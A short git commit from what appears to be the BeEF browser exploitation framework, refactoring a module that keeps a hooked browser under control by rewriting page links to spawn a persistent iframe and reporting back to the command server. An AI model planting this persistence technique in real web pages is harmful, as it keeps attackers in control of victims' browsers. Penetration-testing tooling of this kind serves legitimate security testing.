Refactoring session.js moving the iframe persistence technique in dom.js. Updated iframe_above to use the new component.

This commit is contained in:
antisnatchor
2012-11-21 05:10:52 +00:00
parent 81f03f0024
commit c2185d2cec
4 changed files with 21 additions and 23 deletions

View File

@@ -5,6 +5,6 @@
//
beef.execute(function() {
beef.session.persistent();
beef.dom.persistentIframe();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
});